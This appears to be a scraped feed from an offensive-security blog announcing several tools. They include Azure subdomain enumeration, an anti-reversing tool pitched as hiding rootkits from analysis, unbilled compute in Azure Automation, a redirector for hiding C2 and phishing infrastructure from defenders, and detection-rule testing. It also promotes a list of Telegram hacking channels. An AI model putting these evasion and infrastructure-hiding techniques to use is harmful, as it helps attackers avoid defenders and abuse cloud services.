<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-69817349911366898972024-02-18T17:11:00.000-08:002024-02-18T17:12:30.018-08:00Navigating Telegram’s Underworld: A Cipher for the Elite Hackers<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzd_vbpxHl8r4YdtQEpO8PIn96hwz_UtXrzq64oeAgfrnL6aomAX6FTNw16jNNsO2h9xMN2S5X_Cd4Qk2fHP5SdwOICY3UMeZG9kbG_CrvSOyfYAxlYeZb7CQwrpHbgr0oxRwrvGu7mqhtdFSZfAUntN5DCkCbs3dhXWwLLD16AwiBYqtgpHixFen8lkU/s1024/DALL%C2%B7E%202024-02-18%2022.07.43%20-%20A%20visually%20striking%20and%20complex%20image%20representing%20the%20digital%20underworld%20of%20Telegram,%20where%20encrypted%20channels%20hide%20beneath%20layers%20of%20cybersecurity%20a.webp" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1024" height="466" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzd_vbpxHl8r4YdtQEpO8PIn96hwz_UtXrzq64oeAgfrnL6aomAX6FTNw16jNNsO2h9xMN2S5X_Cd4Qk2fHP5SdwOICY3UMeZG9kbG_CrvSOyfYAxlYeZb7CQwrpHbgr0oxRwrvGu7mqhtdFSZfAUntN5DCkCbs3dhXWwLLD16AwiBYqtgpHixFen8lkU/w466-h466/DALL%C2%B7E%202024-02-18%2022.07.43%20-%20A%20visually%20striking%20and%20complex%20image%20representing%20the%20digital%20underworld%20of%20Telegram,%20where%20encrypted%20channels%20hide%20beneath%20layers%20of%20cybersecurity%20a.webp" width="466" /></a></div><br /><div data-target="react-app.reactRoot"><br /></div><div data-target="react-app.reactRoot"><br /></div><div data-target="react-app.reactRoot" style="text-align: justify;">In the encrypted depths of Telegram, far beyond the scrutiny of average netizens, lies a network pulsating with the lifeblood of the hacking elite. This isn’t your run-of-the-mill tutorial or a hacker’s 101 guide. This post is a deep dive into the abyss, mapping the veins of active and dormant channels that are the backbone of cyber threat intelligence and underground hacking operations.</div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot" style="text-align: justify;">The channels we’re dissecting today are not just communication lines; they are the hidden layers of the onion, each peel revealing more about the dark arts of digital dominance. From active dens where real-time data breaches, exploit trades, and botnet controls unfold, to the ghostly silence of channels once alive with the chatter of codes and hacks now lying dormant or expired - every link, every channel, serves as a node in the vast neural network of the global hacking community.</div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot" style="text-align: justify;"><b>Active Channels: The Frontlines</b></div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot" style="text-align: justify;">Here, in the buzzing hive of active channels, you're as likely to find a zero-day exploit as you are a discussion on the latest evasion techniques. This isn't just about sharing tools or data; it's a relentless innovation race. Techniques, scripts, and methodologies discussed here are not for the faint-hearted but for those who command the terminal like it’s an extension of their mind.</div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot" style="text-align: justify;"><b>Dormant/Expired Channels: The Archives</b></div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot" style="text-align: justify;">The silent corridors of expired channels are not just digital tombs; they are treasure troves of past operations, a testament to the ephemeral nature of digital power. Each one holds lessons, failures, and victories. They are the archives for those willing to learn from history to master the future.</div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot" style="text-align: center;"><span style="font-size: x-large;"><b><a href="https://github.com/fastfire/deepdarkCTI/blob/main/telegram.md" target="_blank">Access The Repository</a></b></span></div><div data-target="react-app.reactRoot" style="text-align: justify;"><br /></div><div data-target="react-app.reactRoot"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-31886191924766651142024-02-18T16:08:00.000-08:002024-02-18T16:08:10.698-08:00AzSubEnum - Azure Service Subdomain Enumeration<article><div class="post-body entry-content" id="post-body-8949972734601761999" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiUC0NcIsSKLyaQqCb7HePNPtPEi9hfi1wQRgruyAHdqBuUDeY84kPZQLL7QNLfresznEv7lH5eUajY1aOnnEAVVfZ0fuxpCcPsS9gPz0TwLUOlur-f32W65Bj_dLCh2WlIsDQiXKYJW3EacuftlPhr_NpY-HsdZlHjTyiYrdS-XPgQG1HHvD3zaUP8yS5X"><img alt="" border="0" height="374" id="BLOGGER_PHOTO_ID_7336838042181186818" src="https://blogger.googleusercontent.com/img/a/AVvXsEiUC0NcIsSKLyaQqCb7HePNPtPEi9hfi1wQRgruyAHdqBuUDeY84kPZQLL7QNLfresznEv7lH5eUajY1aOnnEAVVfZ0fuxpCcPsS9gPz0TwLUOlur-f32W65Bj_dLCh2WlIsDQiXKYJW3EacuftlPhr_NpY-HsdZlHjTyiYrdS-XPgQG1HHvD3zaUP8yS5X=w640-h374" width="640" /></a></p><br /><p>AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.</p> <span><a name="more"></a></span><div><br /></div><span style="font-size: large;"><b>How it works?</b></span><br /> <p>AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.</p> <p>With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.</p> <br /><span style="font-size: large;"><b>Why i create this?</b></span><br /> <p>During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, <a href="https://github.com/NetSPI/MicroBurst/blob/master/Misc/Invoke-EnumerateAzureSubDomains.ps1" rel="nofollow" target="_blank" title="Invoke-EnumerateAzureSubDomains">Invoke-EnumerateAzureSubDomains</a> from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.</p> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <pre><code>➜ AzSubEnum git:(main) ✗ python3 azsubenum.py --help<br />usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]<br /><br />Azure Subdomain Enumeration<br /><br />options:<br /> -h, --help show this help message and exit<br /> -b BASE, --base BASE Base name to use<br /> -v, --verbose Show verbose output<br /> -t THREADS, --threads THREADS<br /> Number of threads for concurrent execution<br /> -p PERMUTATIONS, --permutations PERMUTATIONS<br /> File containing permutations<br /></code></pre> <p>Basic enumeration:</p> <pre><code>python3 azsubenum.py -b retailcorp --thread 10<br /></code></pre> <p>Using permutation wordlists:</p> <pre><code>python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt<br /></code></pre> <p>With verbose output:</p> <pre><code>python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt --verbose<br /></code></pre> <p><br /></p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/yuyudhn/AzSubEnum" rel="nofollow" target="_blank" title="Download AzSubEnum">Download AzSubEnum</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-67168210944420962422024-02-18T16:06:00.000-08:002024-02-18T16:06:34.020-08:00NullSection - An Anti-Reversing Tool That Applies A Technique That Overwrites The Section Header With Nullbytes<article><div class="post-body entry-content" id="post-body-8731917678747533080" itemprop="articleBody"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhOTpJv7-KVVhhI8i0Ka61tLH1jQmZbF4zB4-O2sYWafDM74FBiF3UW289PuT2xuN4xOq1kDI3FvzuRfkNq6o_JGMVPdVJCEFhK5jgSZUGsDCiTtWsNTF1QLgHO_lF3afyBXA4_smk-08-xpGybJcSCeEPzzimS4UY2cs9IDqId2lUgEctiEUCJ6RalV5k/s1396/NullSection.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="776" data-original-width="1396" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhOTpJv7-KVVhhI8i0Ka61tLH1jQmZbF4zB4-O2sYWafDM74FBiF3UW289PuT2xuN4xOq1kDI3FvzuRfkNq6o_JGMVPdVJCEFhK5jgSZUGsDCiTtWsNTF1QLgHO_lF3afyBXA4_smk-08-xpGybJcSCeEPzzimS4UY2cs9IDqId2lUgEctiEUCJ6RalV5k/w640-h356/NullSection.png" width="640" /></a></div><p><br /></p> <p>NullSection is an Anti-Reversing tool that applies a technique that overwrites the section header with nullbytes.</p> <span><a name="more"></a></span><div><br /></div><span style="font-size: large;"><b>Install</b></span><br /> <pre><code>git clone https://github.com/MatheuZSecurity/NullSection<br />cd NullSection<br />gcc nullsection.c -o nullsection<br />./nullsection<br /></code></pre> <br /><span style="font-size: large;"><b>Advantage</b></span><br /> <p>When running nullsection on any ELF, it could be .ko rootkit, after that if you use Ghidra/IDA to parse ELF functions, nothing will appear no function to parse in the decompiler for example, even if you run readelf -S / path /to/ elf the following message will appear "There are no sections in this file."</p> <p>Make good use of the tool!</p> <br /><b>Note</b><br /> <pre><code>We are not responsible for any damage caused by this tool, use the tool intelligently and for educational purposes only.</code></pre><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/MatheuZSecurity/NullSection" rel="nofollow" target="_blank" title="Download NullSection">Download NullSection</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-42303710836718850022024-02-18T16:04:00.000-08:002024-02-18T16:04:09.991-08:00WEB-Wordlist-Generator - Creates Related Wordlists After Scanning Your Web Applications<article><div class="post-body entry-content" id="post-body-488382308568355329" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjHila5XtGJjXxNC5MVtZIFF5UmYs0l6WIH_FEP_0Za6LItMU_uZuhOUXjawIWEl6r3s8G_6lwp0sNSh7UQCY6gIuKshFKd04JSG7qDF0lSzmhDOp6kEAHq6icYyca2A8AaCIC0LOrbV9mcytzwDxy-LK05leKKuM1-qDfhlz6LHkejm8qIATlhleBNcfuw"><img alt="" border="0" height="308" id="BLOGGER_PHOTO_ID_7335339800282448578" src="https://blogger.googleusercontent.com/img/a/AVvXsEjHila5XtGJjXxNC5MVtZIFF5UmYs0l6WIH_FEP_0Za6LItMU_uZuhOUXjawIWEl6r3s8G_6lwp0sNSh7UQCY6gIuKshFKd04JSG7qDF0lSzmhDOp6kEAHq6icYyca2A8AaCIC0LOrbV9mcytzwDxy-LK05leKKuM1-qDfhlz6LHkejm8qIATlhleBNcfuw=w640-h308" width="640" /></a></p><p><br /></p> <p>WEB-Wordlist-Generator scans your web applications and creates related wordlists to take preliminary countermeasures against cyber attacks.</p> <span><a name="more"></a></span><div><br /></div><span style="font-size: large;"><b>Done</b></span><br /> <ul> <li>[x] Scan Static Files.</li> <li>[ ] Scan Metadata Of Public Documents (pdf,doc,xls,ppt,docx,pptx,xlsx etc.) </li> <li>[ ] Create a New Associated Wordlist with the Wordlist Given as a Parameter.</li> </ul> <br /><span style="font-size: large;"><b>Installation</b></span><br /> <br /><b>From Git</b><br /> <pre><code>git clone https://github.com/OsmanKandemir/web-wordlist-generator.git<br />cd web-wordlist-generator && pip3 install -r requirements.txt<br />python3 generator.py -d target-web.com<br /></code></pre> <br /><b>From Dockerfile</b><br /> <p>You can run this application on a container after build a Dockerfile.</p> <pre><code>docker build -t webwordlistgenerator .<br />docker run webwordlistgenerator -d target-web.com -o<br /></code></pre> <br /><b>From DockerHub</b><br /> <p>You can run this application on a container after pulling from DockerHub.</p> <pre><code>docker pull osmankandemir/webwordlistgenerator:v1.0<br />docker run osmankandemir/webwordlistgenerator:v1.0 -d target-web.com -o<br /></code></pre> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <pre><code>-d DOMAINS [DOMAINS], --domains DOMAINS [DOMAINS] Input Multi or Single Targets. --domains target-web1.com target-web2.com<br />-p PROXY, --proxy PROXY Use HTTP proxy. --proxy 0.0.0.0:8080<br />-a AGENT, --agent AGENT Use agent. --agent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'<br />-o PRINT, --print PRINT Use Print outputs on terminal screen.<br /><br /></code></pre><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/OsmanKandemir/web-wordlist-generator" rel="nofollow" target="_blank" title="Download Web-Wordlist-Generator">Download Web-Wordlist-Generator</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-49252171748978098142024-02-18T16:02:00.000-08:002024-02-18T16:02:25.952-08:00CloudMiner - Execute Code Using Azure Automation Service Without Getting Charged<article><div class="post-body entry-content" id="post-body-9171197228075669367" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhS6Zeh0JwcBNfQfyOQaJpItsi9HwkMfvaATzYYxE94kT7oT1sJR1SVV9r3KbnLf7VtP5V7F4fys4cikCRwuSS1Ro0Q6rCShZ20wt2KCEfmfvVP1jpOS2EduMUQVFKEOd8MpE8BKevqrgnHfL75W9X5zLPgiME50e3-c9zUlAwSfWNxE7_vnpczraVLgUat"><img alt="" border="0" height="326" id="BLOGGER_PHOTO_ID_7317786885148999122" src="https://blogger.googleusercontent.com/img/a/AVvXsEhS6Zeh0JwcBNfQfyOQaJpItsi9HwkMfvaATzYYxE94kT7oT1sJR1SVV9r3KbnLf7VtP5V7F4fys4cikCRwuSS1Ro0Q6rCShZ20wt2KCEfmfvVP1jpOS2EduMUQVFKEOd8MpE8BKevqrgnHfL75W9X5zLPgiME50e3-c9zUlAwSfWNxE7_vnpczraVLgUat=w640-h326" width="640" /></a></p><p><br /></p> <p dir="auto">Execute code within Azure Automation service without getting charged</p> <h2 dir="auto" tabindex="-1">Description</h2> <p dir="auto">CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.</p> <ul dir="auto"> <li> <p dir="auto">This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged.</p> </li> <li> <p dir="auto">Each execution is limited to 3 hours</p> </li> </ul><span><a name="more"></a></span><div><br /></div> <h2 dir="auto" tabindex="-1">Requirements</h2> <ol dir="auto"> <li>Python 3.8+ with the libraries mentioned in the file <code>requirements.txt</code></li> <li>Configured Azure CLI - <a href="https://learn.microsoft.com/en-us/cli/azure/install-azure-cli" rel="nofollow" target="_blank" title="https://learn.microsoft.com/en-us/cli/azure/install-azure-cli">https://learn.microsoft.com/en-us/cli/azure/install-azure-cli</a> <ul dir="auto"> <li>Account must be logged in before using this tool</li> </ul> </li> </ol> <h2 dir="auto" tabindex="-1">Installation</h2> <p dir="auto"><code>pip install .</code></p> <h2 dir="auto" tabindex="-1">Usage</h2> <div><pre><code>usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]<br /><br />CloudMiner - Free computing power in Azure Automation Service<br /><br />optional arguments:<br /> -h, --help show this help message and exit<br /> --path PATH the script path (Powershell or Python)<br /> --id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/a<br /> utomationAccounts/{automationAccountName}<br /> -c COUNT, --count COUNT<br /> number of executions<br /> -t TOKEN, --token TOKEN<br /> Azure access token (optional). If not provided, token will be retrieved using the Azure CLI<br /> -r REQUIREMENTS, --requirements REQUIREMENTS<br /> Path to requirements file to be installed and use by the script (relevant to Python scripts only)<br /> -v, --verbose Enable verbose mode<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Example usage</h2> <h3 dir="auto" tabindex="-1">Python</h3> <p dir="auto" style="text-align: center;"><a href="https://github.com/SafeBreach-Labs/CloudMiner/blob/main/images/cloud-miner-usage-python.png?raw=true" rel="nofollow" target="_blank" title="Execute code using Azure Automation service without getting charged (6)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhS6Zeh0JwcBNfQfyOQaJpItsi9HwkMfvaATzYYxE94kT7oT1sJR1SVV9r3KbnLf7VtP5V7F4fys4cikCRwuSS1Ro0Q6rCShZ20wt2KCEfmfvVP1jpOS2EduMUQVFKEOd8MpE8BKevqrgnHfL75W9X5zLPgiME50e3-c9zUlAwSfWNxE7_vnpczraVLgUat"><img alt="" border="0" height="326" id="BLOGGER_PHOTO_ID_7317786885148999122" src="https://blogger.googleusercontent.com/img/a/AVvXsEhS6Zeh0JwcBNfQfyOQaJpItsi9HwkMfvaATzYYxE94kT7oT1sJR1SVV9r3KbnLf7VtP5V7F4fys4cikCRwuSS1Ro0Q6rCShZ20wt2KCEfmfvVP1jpOS2EduMUQVFKEOd8MpE8BKevqrgnHfL75W9X5zLPgiME50e3-c9zUlAwSfWNxE7_vnpczraVLgUat=w640-h326" width="640" /></a></p> <h3 dir="auto" tabindex="-1">Powershell</h3> <p dir="auto" style="text-align: center;"><a href="https://github.com/SafeBreach-Labs/CloudMiner/blob/main/images/cloud-miner-usage-powershell.png?raw=true" rel="nofollow" target="_blank" title="Execute code using Azure Automation service without getting charged (7)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhIFUv_pQm5omoivDvUdeNvnfuxKKfIEwNQ-Ba8dWMpW-FS2oMJa5izRiBDr_GBC_8cZnmBKuAVtVna_yaLT2mgv94omiefRuIkP0v8hAl433LeGfc40-qr1P27h3zbgZBRoJWMHeT3QroFFDaABtprt_1iEdPoB0q3xHTTo0uzhz27XMAKu_qZRj9Nm1YO"><img alt="" border="0" height="268" id="BLOGGER_PHOTO_ID_7317786901488172306" src="https://blogger.googleusercontent.com/img/a/AVvXsEhIFUv_pQm5omoivDvUdeNvnfuxKKfIEwNQ-Ba8dWMpW-FS2oMJa5izRiBDr_GBC_8cZnmBKuAVtVna_yaLT2mgv94omiefRuIkP0v8hAl433LeGfc40-qr1P27h3zbgZBRoJWMHeT3QroFFDaABtprt_1iEdPoB0q3xHTTo0uzhz27XMAKu_qZRj9Nm1YO=w640-h268" width="640" /></a></p> <h2 dir="auto" tabindex="-1">License</h2> <p dir="auto">CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.</p> <h2 dir="auto" tabindex="-1">Author - Ariel Gamrian</h2> <ul dir="auto"> <li>LinkedIn - <a href="https://www.linkedin.com/in/ariel-gamrian/" rel="nofollow" target="_blank" title="Ariel Gamrian">Ariel Gamrian</a></li></ul><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/SafeBreach-Labs/CloudMiner" rel="nofollow" target="_blank" title="Download CloudMiner">Download CloudMiner</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-13333964401757991942024-02-18T16:00:00.000-08:002024-02-18T16:00:25.062-08:00BounceBack - Stealth Redirector For Your Red Team Operation Security<article><div class="post-body entry-content" id="post-body-773064837929871074" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjBaUL8aV4ZLMq0i6D_J7gcRq8WG054dGPRC5bwoR9rzFJEJV5V97PvAjjlox_dIqb0JwXoySa7uRRmN3ab6cJlQm9nHOQJkQ3RbGP6bEo5ZQ07T83UHDd34K_9ZJQxg09EL8Q1_99kFqyqOFZfovBv6M6peusx5kRLhJsOtG8vA6MckAgACNavn7mETpWr"><img alt="" border="0" height="504" id="BLOGGER_PHOTO_ID_7310075473526524002" src="https://blogger.googleusercontent.com/img/a/AVvXsEjBaUL8aV4ZLMq0i6D_J7gcRq8WG054dGPRC5bwoR9rzFJEJV5V97PvAjjlox_dIqb0JwXoySa7uRRmN3ab6cJlQm9nHOQJkQ3RbGP6bEo5ZQ07T83UHDd34K_9ZJQxg09EL8Q1_99kFqyqOFZfovBv6M6peusx5kRLhJsOtG8vA6MckAgACNavn7mETpWr=w640-h504" width="640" /></a></p><p><br /></p> <p dir="auto">BounceBack is a powerful, highly customizable and configurable reverse proxy with WAF functionality for hiding your C2/phishing/etc infrastructure from blue teams, sandboxes, scanners, etc. It uses real-time traffic analysis through various filters and their combinations to hide your tools from illegitimate visitors.</p> <p dir="auto">The tool is distributed with preconfigured lists of blocked words, blocked and allowed IP addresses.</p> <p dir="auto">For more information on tool usage, you may visit <a href="https://github.com/D00Movenok/BounceBack/wiki" rel="nofollow" target="_blank" title="project's wiki">project's wiki</a>.</p> <h2 dir="auto" tabindex="-1">Features</h2> <ul dir="auto"> <li>Highly configurable and customizable filters pipeline with boolean-based concatenation of rules will be able to hide your infrastructure from the most keen blue eyes.</li> <li>Easily extendable project structure, everyone can add rules for their own C2.</li> <li>Integrated and curated massive blacklist of IPv4 pools and ranges known to be associated with IT Security vendors combined with IP filter to disallow them to use/attack your infrastructure.</li> <li>Malleable C2 Profile parser is able to validate inbound HTTP(s) traffic against the Malleable's config and reject invalidated packets.</li> <li>Out of the box domain fronting support allows you to hide your infrastructure a little bit more.</li> <li>Ability to check the IPv4 address of request against IP Geolocation/reverse lookup data and compare it to specified regular expressions to exclude out peers connecting outside allowed companies, nations, cities, domains, etc.</li> <li>All incoming requests may be allowed/disallowed for any time period, so you may configure work time filters.</li> <li>Support for multiple proxies with different filter pipelines at one BounceBack instance.</li> <li>Verbose logging mechanism allows you to keep track of all incoming requests and events for analyzing blue team behaviour and debug issues.</li> </ul> <h2 dir="auto" tabindex="-1">Rules</h2> <p dir="auto">BounceBack currently supports the following filters:</p> <ul dir="auto"> <li>Boolean-based (and, or, not) rules combinations</li> <li>IP and subnet analysis</li> <li>IP geolocation fields inspection</li> <li>Reverse lookup domain probe</li> <li>Raw packet regexp matching</li> <li>Malleable C2 profiles traffic validation</li> <li>Work (or not) hours rule</li> </ul> <p dir="auto">Custom rules may be easily added, just register your <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/rules/default.go#L9" rel="nofollow" target="_blank" title="RuleBaseCreator">RuleBaseCreator</a> or <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/rules/default.go#L3" rel="nofollow" target="_blank" title="RuleWrapperCreator">RuleWrapperCreator</a>. See already created <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/rules/base_common.go" rel="nofollow" target="_blank" title="RuleBaseCreators">RuleBaseCreators</a> and <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/rules/wrappers.go" rel="nofollow" target="_blank" title="RuleWrapperCreators">RuleWrapperCreators</a></p> <p dir="auto">Rules configuration page may be found <a href="https://github.com/D00Movenok/BounceBack/wiki/1.-Rules" rel="nofollow" target="_blank" title="here">here</a>.</p> <h2 dir="auto" tabindex="-1">Proxies</h2> <p dir="auto">At the moment, BounceBack supports the following protocols:</p> <ul dir="auto"> <li>HTTP(s) for your web infrastructure</li> <li>DNS for your DNS tunnels</li> <li>Raw TCP (with or without tls) and UDP for custom protocols</li> </ul> <p dir="auto">Custom protocols may be easily added, just register your new type <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/proxy/manager.go" rel="nofollow" target="_blank" title="in manager">in manager</a>. Example proxy realizations may be found <a href="https://github.com/D00Movenok/BounceBack/blob/main/internal/proxy" rel="nofollow" target="_blank" title="here">here</a>.</p> <p dir="auto">Proxies configuration page may be found <a href="https://github.com/D00Movenok/BounceBack/wiki/2.-Proxies" rel="nofollow" target="_blank" title="here">here</a>.</p> <h2 dir="auto" tabindex="-1">Installation</h2> <p dir="auto">Just download latest release from <a href="https://github.com/D00Movenok/BounceBack/releases" rel="nofollow" target="_blank" title="release page">release page</a>, unzip it, edit config file and go on.</p> <p dir="auto">If you want to build it from source, <a href="https://goreleaser.com/install/" rel="nofollow" target="_blank" title="install goreleaser">install goreleaser</a> and run:</p> <div><pre><code>goreleaser release --clean --snapshot</code></pre></div><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/D00Movenok/BounceBack" rel="nofollow" target="_blank" title="Download BounceBack">Download BounceBack</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-76476692086194165692024-02-18T15:58:00.000-08:002024-02-18T15:58:05.005-08:00PurpleKeep - Providing Azure Pipelines To Create An Infrastructure And Run Atomic Tests<article><div class="post-body entry-content" id="post-body-3884830259231703358" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo"><img alt="" border="0" height="258" id="BLOGGER_PHOTO_ID_7310071996835853026" src="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo=w640-h258" width="640" /></a></p><div><br /></div> <p dir="auto">With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.</p> <p dir="auto">To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the automated testing of detection rules. Leveraging the capabilities of the <a href="https://atomicredteam.io" rel="nofollow" target="_blank" title="Atomic Red Team project">Atomic Red Team project</a> which allows to simulate attacks following <a href="https://attack.mitre.org/" rel="nofollow" target="_blank" title="MITRE TTPs">MITRE TTPs</a> (Tactics, Techniques, and Procedures). PurpleKeep enhances the simulation of these TTPs to serve as a starting point for the evaluation of the effectiveness of detection rules.</p> <p dir="auto">Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. However, PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and instrumentation of the targeted platform.</p> <p dir="auto">Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.</p> <p dir="auto">To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.</p> <p dir="auto">TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.</p> <h2 dir="auto" tabindex="-1">Requirements</h2> <p dir="auto">The project is based on Azure Pipelines and requires the following to be able to run:</p> <ul dir="auto"> <li>Azure Service Connection to a resource group as described in the <a href="https://learn.microsoft.com/en-us/azure/devops/pipelines/library/service-endpoints?view=azure-devops&tabs=yaml" rel="nofollow" target="_blank" title="Microsoft Docs">Microsoft Docs</a></li> <li>Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application</li> <li>MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and make it accessible to the pipelines</li> </ul> <h3 dir="auto" tabindex="-1">Optional</h3> <p dir="auto">You can provide a security and/or audit policy file that will be loaded to mimic your Group Policy configurations. Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.</p> <p dir="auto">Refer to the <a href="https://github.com/Retrospected/PurpleKeep/blob/main/variables.yml" rel="nofollow" target="_blank" title="variables">variables</a> file for your configurable items.</p> <h2 dir="auto" tabindex="-1">Design</h2> <p dir="auto" style="text-align: center;"><a href="https://github.com/Retrospected/PurpleKeep/blob/main/docs/PurpleKeep_1.0.jpg" rel="nofollow" target="_blank" title="Providing Azure pipelines to create an infrastructure and run Atomic tests. (9)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo"><img alt="" border="0" height="258" 